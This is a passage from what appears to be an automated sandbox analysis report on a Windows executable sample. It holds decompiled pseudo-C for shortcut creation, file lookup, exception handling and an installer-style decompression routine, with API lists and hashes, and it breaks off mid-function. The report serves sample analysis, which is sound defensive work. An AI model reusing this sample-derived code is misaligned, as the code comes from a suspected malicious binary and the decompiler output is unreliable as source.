                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$cegrwbhzuj$=`
                                                                                                • API String ID: 900638850-4272273129
                                                                                                • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                                • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                                                                                • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                                • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E00402012() {
                                                                                                				void* _t44;
                                                                                                				intOrPtr* _t48;
                                                                                                				intOrPtr* _t50;
                                                                                                				intOrPtr* _t52;
                                                                                                				intOrPtr* _t54;
                                                                                                				signed int _t58;
                                                                                                				intOrPtr* _t59;
                                                                                                				intOrPtr* _t62;
                                                                                                				intOrPtr* _t64;
                                                                                                				intOrPtr* _t66;
                                                                                                				intOrPtr* _t69;
                                                                                                				intOrPtr* _t71;
                                                                                                				int _t75;
                                                                                                				signed int _t81;
                                                                                                				intOrPtr* _t88;
                                                                                                				void* _t95;
                                                                                                				void* _t96;
                                                                                                				void* _t100;
                                                                                                
                                                                                                				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                                                                                				_t96 = E004029E8(0xffffffdf);
                                                                                                				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                                                                                				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                                                                                				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                                                                                				if(E0040548B(_t96) == 0) {
                                                                                                					E004029E8(0x21);
                                                                                                				}
                                                                                                				_t44 = _t100 + 8;
                                                                                                				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                                                                                                				if(_t44 < _t75) {
                                                                                                					L13:
                                                                                                					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                                					_push(0xfffffff0);
                                                                                                				} else {
                                                                                                					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                                					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                                                                                                					if(_t95 >= _t75) {
                                                                                                						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                                						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                                						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                                						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                                                						_t81 =  *(_t100 - 0x14);
                                                                                                						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                                						if(_t58 != 0) {
                                                                                                							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                                							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                                							_t81 =  *(_t100 - 0x14);
                                                                                                						}
                                                                                                						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                                						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                                                                                							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                                							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                                                                                						}
                                                                                                						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                                						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                                                						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                                						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                                                						if(_t95 >= _t75) {
                                                                                                							_t95 = 0x80004005;
                                                                                                							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
                                                                                                								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                                								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
                                                                                                							}
                                                                                                						}
                                                                                                						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                                						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                                					}
                                                                                                					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                                					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                                					if(_t95 >= _t75) {
                                                                                                						_push(0xfffffff4);
                                                                                                					} else {
                                                                                                						goto L13;
                                                                                                					}
                                                                                                				}
                                                                                                				E00401423();
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
                                                                                                				return 0;
                                                                                                			}


                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                • API String ID: 123533781-47812868
                                                                                                • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                                • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                                                                                • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                                • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDB2A42(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                
                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                				return UnhandledExceptionFilter(_a4);
                                                                                                			}



                                                                                                0x6edb2a47
                                                                                                0x6edb2a57

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6EDB5348,6EDBC9E8,00000001,?,6EDB545F,6EDBC9E8,00000017), ref: 6EDB2A47
                                                                                                • UnhandledExceptionFilter.KERNEL32(6EDBC9E8,?,6EDB5348,6EDBC9E8,00000001,?,6EDB545F,6EDBC9E8,00000017), ref: 6EDB2A50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 3ec1d9970bed65304ce15fad658dc738f412a43530d114b8f22b5a03eea585f5
                                                                                                • Instruction ID: 457dc31bc9bfd5dc5acf7fea3819ebcb6b3f3fd5d3024c0e3cea86674b8bf3cd
                                                                                                • Opcode Fuzzy Hash: 3ec1d9970bed65304ce15fad658dc738f412a43530d114b8f22b5a03eea585f5
                                                                                                • Instruction Fuzzy Hash: 62B09271448608EBEE202BA9D849BA83F28EF076A2F000010F65D44194EB6254528A91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 39%
                                                                                                			E00402630(char __ebx, char* __edi, char* __esi) {
                                                                                                				void* _t19;
                                                                                                
                                                                                                				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                                                					E00405889(__edi, _t6);
                                                                                                					_push(_t19 - 0x178);
                                                                                                					_push(__esi);
                                                                                                					E0040592B();
                                                                                                				} else {
                                                                                                					 *__edi = __ebx;
                                                                                                					 *__esi = __ebx;
                                                                                                					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                				return 0;
                                                                                                			}





                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                                • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                                                                                • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                                • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E00406043(signed int __ebx, signed int* __esi) {
                                                                                                				signed int _t396;
                                                                                                				signed int _t425;
                                                                                                				signed int _t442;
                                                                                                				signed int _t443;
                                                                                                				signed int* _t446;
                                                                                                				void* _t448;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					_t446 = __esi;
                                                                                                					_t425 = __ebx;
                                                                                                					if( *(_t448 - 0x34) == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					L55:
                                                                                                					__eax =  *(__ebp - 0x38);
                                                                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                					__ecx = __ebx;
                                                                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                					__ebx = __ebx + 8;
                                                                                                					while(1) {
                                                                                                						L56:
                                                                                                						if(__ebx < 0xe) {
                                                                                                							goto L0;
                                                                                                						}
                                                                                                						L57:
                                                                                                						__eax =  *(__ebp - 0x40);
                                                                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                						__ecx = __eax;
                                                                                                						__esi[1] = __eax;
                                                                                                						__ecx = __eax & 0x0000001f;
                                                                                                						if(__cl > 0x1d) {
                                                                                                							L9:
                                                                                                							_t443 = _t442 | 0xffffffff;
                                                                                                							 *_t446 = 0x11;
                                                                                                							L10:
                                                                                                							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                							_t446[0x146] = _t425;
                                                                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                							L11:
                                                                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                							E004067B2( *(_t448 + 8));
                                                                                                							return _t443;
                                                                                                						}
                                                                                                						L58:
                                                                                                						__eax = __eax & 0x000003e0;
                                                                                                						if(__eax > 0x3a0) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						L59:
                                                                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                						__ebx = __ebx - 0xe;
                                                                                                						_t94 =  &(__esi[2]);
                                                                                                						 *_t94 = __esi[2] & 0x00000000;
                                                                                                						 *__esi = 0xc;
                                                                                                						while(1) {
                                                                                                							L60:
                                                                                                							__esi[1] = __esi[1] >> 0xa;
                                                                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                								goto L68;
                                                                                                							}
                                                                                                							L61:
                                                                                                							while(1) {
                                                                                                								L64:
                                                                                                								if(__ebx >= 3) {
                                                                                                									break;
                                                                                                								}
                                                                                                								L62:
                                                                                                								if( *(__ebp - 0x34) == 0) {
                                                                                                									goto L182;
                                                                                                								}
                                                                                                								L63:
                                                                                                								__eax =  *(__ebp - 0x38);
                                                                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                								__ecx = __ebx;
                                                                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                								__ebx = __ebx + 8;
                                                                                                							}
                                                                                                							L65:
                                                                                                							__ecx = __esi[2];
                                                                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                							__ebx = __ebx - 3;
                                                                                                							_t108 = __ecx + 0x407374; // 0x121110
                                                                                                							__ecx =  *_t108;
                                                                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                							__ecx = __esi[1];
                                                                                                							__esi[2] = __esi[2] + 1;
                                                                                                							__eax = __esi[2];
                                                                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                								goto L64;
                                                                                                							}
                                                                                                							L66:
                                                                                                							while(1) {
                                                                                                								L68:
                                                                                                								if(__esi[2] >= 0x13) {
                                                                                                									break;
                                                                                                								}
                                                                                                								L67:
                                                                                                								_t119 = __esi[2] + 0x407374; // 0x4000300
                                                                                                								__eax =  *_t119;
                                                                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                								_t126 =  &(__esi[2]);
                                                                                                								 *_t126 = __esi[2] + 1;
                                                                                                							}
                                                                                                							L69:
                                                                                                							__ecx = __ebp - 8;
                                                                                                							__edi =  &(__esi[0x143]);
                                                                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                							__eax = 0;
                                                                                                							 *(__ebp - 8) = 0;
                                                                                                							__eax =  &(__esi[3]);
                                                                                                							 *__edi = 7;
                                                                                                							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                							if(__eax != 0) {
                                                                                                								L72:
                                                                                                								 *__esi = 0x11;
                                                                                                								while(1) {
                                                                                                									L180:
                                                                                                									_t396 =  *_t446;
                                                                                                									if(_t396 > 0xf) {
                                                                                                										break;
                                                                                                									}
                                                                                                									L1:
                                                                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
                                                                                                										case 0:
                                                                                                											L101:
                                                                                                											__eax = __esi[4] & 0x000000ff;
                                                                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                											__eax = __esi[5];
                                                                                                											__esi[2] = __esi[5];
                                                                                                											 *__esi = 1;
                                                                                                											goto L102;
                                                                                                										case 1:
                                                                                                											L102:
                                                                                                											__eax = __esi[3];
                                                                                                											while(1) {
                                                                                                												L105:
                                                                                                												__eflags = __ebx - __eax;
                                                                                                												if(__ebx >= __eax) {
                                                                                                													break;
                                                                                                												}
                                                                                                												L103:
                                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                                													goto L182;
                                                                                                												}
                                                                                                												L104:
                                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                												__ecx = __ebx;
                                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                												__ebx = __ebx + 8;
                                                                                                												__eflags = __ebx;
                                                                                                											}
                                                                                                											L106:
                                                                                                											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                                                                											__eax = __eax &  *(__ebp - 0x40);
                                                                                                											__ecx = __esi[2];
                                                                                                											__eax = __esi[2] + __eax * 4;
                                                                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                											__ecx =  *__eax & 0x000000ff;
                                                                                                											__eflags = __ecx;
                                                                                                											if(__ecx != 0) {
                                                                                                												L108:
                                                                                                												__eflags = __cl & 0x00000010;
                                                                                                												if((__cl & 0x00000010) == 0) {
                                                                                                													L110:
                                                                                                													__eflags = __cl & 0x00000040;
                                                                                                													if((__cl & 0x00000040) == 0) {
                                                                                                														goto L125;
                                                                                                													}
                                                                                                													L111:
                                                                                                													__eflags = __cl & 0x00000020;
                                                                                                													if((__cl & 0x00000020) == 0) {
                                                                                                														goto L9;
                                                                                                													}
                                                                                                													L112:
                                                                                                													 *__esi = 7;
                                                                                                													goto L180;
                                                                                                												}
                                                                                                												L109:
                                                                                                												__esi[2] = __ecx;
                                                                                                												__esi[1] = __eax;
                                                                                                												 *__esi = 2;
                                                                                                												goto L180;
                                                                                                											}
                                                                                                											L107:
                                                                                                											__esi[2] = __eax;
                                                                                                											 *__esi = 6;
                                                                                                											goto L180;
                                                                                                										case 2:
                                                                                                											L113:
                                                                                                											__eax = __esi[2];
                                                                                                											while(1) {
                                                                                                												L116:
                                                                                                												__eflags = __ebx - __eax;
                                                                                                												if(__ebx >= __eax) {
                                                                                                													break;
                                                                                                												}
                                                                                                												L114:
                                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                                													goto L182;
                                                                                                												}
                                                                                                												L115:
                                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                												__ecx = __ebx;
                                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                												__ebx = __ebx + 8;
                                                                                                												__eflags = __ebx;
                                                                                                											}
                                                                                                											L117:
                                                                                                											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                											__ecx = __eax;
                                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                											__ebx = __ebx - __eax;
                                                                                                											__eflags = __ebx;
                                                                                                											__eax = __esi[4] & 0x000000ff;
                                                                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                											__eax = __esi[6];
                                                                                                											__esi[2] = __esi[6];
                                                                                                											 *__esi = 3;
                                                                                                											goto L118;
                                                                                                										case 3:
                                                                                                											L118:
                                                                                                											__eax = __esi[3];
                                                                                                											while(1) {
                                                                                                												L121:
                                                                                                												__eflags = __ebx - __eax;
                                                                                                												if(__ebx >= __eax) {
                                                                                                													break;
                                                                                                												}
                                                                                                												L119:
                                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                                													goto L182;
                                                                                                												}
                                                                                                												L120:
                                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                												__ecx = __ebx;
                                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                												__ebx = __ebx + 8;
                                                                                                												__eflags = __ebx;
                                                                                                											}
                                                                                                											L122:
                                                                                                											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                                                                											__eax = __eax &  *(__ebp - 0x40);
                                                                                                											__ecx = __esi[2];
                                                                                                											__eax = __esi[2] + __eax * 4;
                                                                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                											__ecx =  *__eax & 0x000000ff;
                                                                                                											__eflags = __cl & 0x00000010;
                                                                                                											if((__cl & 0x00000010) == 0) {
                                                                                                												L124:
                                                                                                												__eflags = __cl & 0x00000040;
                                                                                                												if((__cl & 0x00000040) != 0) {
                                                                                                													goto L9;
                                                                                                												}
                                                                                                												L125:
                                                                                                												__esi[3] = __ecx;
                                                                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                                												__esi[2] = __eax;
                                                                                                												goto L180;
                                                                                                											}
                                                                                                											L123:
                                                                                                											__esi[2] = __ecx;
                                                                                                											__esi[3] = __eax;
                                                                                                											 *__esi = 4;
                                                                                                											goto L180;
                                                                                                										case 4:
                                                                                                											L126:
                                                                                                											__eax = __esi[2];
                                                                                                											while(1) {
                                                                                                												L129:
                                                                                                												__eflags = __ebx - __eax;
                                                                                                												if(__ebx >= __eax) {
                                                                                                													break;
                                                                                                												}
                                                                                                												L127:
                                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                                													goto L182;
                                                                                                												}
                                                                                                												L128:
                                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                												__ecx = __ebx;
                                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                												__ebx = __ebx + 8;
                                                                                                												__eflags = __ebx;
                                                                                                											}
                                                                                                											L130:
                                                                                                											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                											__ecx = __eax;
                                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                											__ebx = __ebx - __eax;
                                                                                                											__eflags = __ebx;
                                                                                                											 *__esi = 5;
                                                                                                											goto L131;
                                                                                                										case 5:
                                                                                                											L131:
                                                                                                											__eax =  *(__ebp - 0x30);
                                                                                                											__edx = __esi[3];
                                                                                                											__eax = __eax - __esi;
                                                                                                											__ecx = __eax - __esi - 0x1ba0;
                                                                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                                												__ecx = __eax;
                                                                                                												__ecx = __eax - __edx;
                                                                                                												__eflags = __ecx;
                                                                                                											} else {
                                                                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                                											}
                                                                                                											__eflags = __esi[1];
                                                                                                											 *(__ebp - 0x20) = __ecx;
                                                                                                											if(__esi[1] != 0) {
                                                                                                												L135:
                                                                                                												__edi =  *(__ebp - 0x2c);
                                                                                                												do {
                                                                                                													L136:
                                                                                                													__eflags = __edi;
                                                                                                													if(__edi != 0) {
                                                                                                														goto L152;
                                                                                                													}
                                                                                                													L137:
                                                                                                													__edi = __esi[0x26e8];
                                                                                                													__eflags = __eax - __edi;
                                                                                                													if(__eax != __edi) {
                                                                                                														L143:
                                                                                                														__esi[0x26ea] = __eax;
                                                                                                														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                														__eax = __esi[0x26ea];
                                                                                                														__ecx = __esi[0x26e9];
                                                                                                														__eflags = __eax - __ecx;
                                                                                                														 *(__ebp - 0x30) = __eax;
                                                                                                														if(__eax >= __ecx) {
                                                                                                															__edi = __esi[0x26e8];
                                                                                                															__edi = __esi[0x26e8] - __eax;
                                                                                                															__eflags = __edi;
                                                                                                														} else {
                                                                                                															__ecx = __ecx - __eax;
                                                                                                															__edi = __ecx - __eax - 1;
                                                                                                														}
                                                                                                														__edx = __esi[0x26e8];
                                                                                                														__eflags = __eax - __edx;
                                                                                                														 *(__ebp - 8) = __edx;
                                                                                                														if(__eax == __edx) {
                                                                                                															__edx =  &(__esi[0x6e8]);
                                                                                                															__eflags = __ecx - __edx;
                                                                                                															if(__ecx != __edx) {
                                                                                                																__eax = __edx;
                                                                                                																__eflags = __eax - __ecx;
                                                                                                																 *(__ebp - 0x30) = __eax;
                                                                                                																if(__eax >= __ecx) {
                                                                                                																	__edi =  *(__ebp - 8);
                                                                                                																	__edi =  *(__ebp - 8) - __eax;
                                                                                                																	__eflags = __edi;
                                                                                                																} else {
                                                                                                																	__ecx = __ecx - __eax;
                                                                                                																	__edi = __ecx;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                														__eflags = __edi;
                                                                                                														if(__edi == 0) {
                                                                                                															goto L183;
                                                                                                														} else {
                                                                                                															goto L152;
                                                                                                														}
                                                                                                													}
                                                                                                													L138:
                                                                                                													__ecx = __esi[0x26e9];
                                                                                                													__edx =  &(__esi[0x6e8]);
                                                                                                													__eflags = __ecx - __edx;
                                                                                                													if(__ecx == __edx) {
                                                                                                														goto L143;
                                                                                                													}
                                                                                                													L139:
                                                                                                													__eax = __edx;
                                                                                                													__eflags = __eax - __ecx;
                                                                                                													if(__eax >= __ecx) {
                                                                                                														__edi = __edi - __eax;
                                                                                                														__eflags = __edi;
                                                                                                													} else {
                                                                                                														__ecx = __ecx - __eax;
                                                                                                														__edi = __ecx;
                                                                                                													}
                                                                                                													__eflags = __edi;
                                                                                                													if(__edi == 0) {
                                                                                                														goto L143;
                                                                                                													}
                                                                                                													L152:
                                                                                                													__ecx =  *(__ebp - 0x20);
                                                                                                													 *__eax =  *__ecx;
                                                                                                													__eax = __eax + 1;
                                                                                                													__ecx = __ecx + 1;
                                                                                                													__edi = __edi - 1;
                                                                                                													__eflags = __ecx - __esi[0x26e8];
                                                                                                													 *(__ebp - 0x30) = __eax;
                                                                                                													 *(__ebp - 0x20) = __ecx;
                                                                                                													 *(__ebp - 0x2c) = __edi;
                                                                                                													if(__ecx == __esi[0x26e8]) {
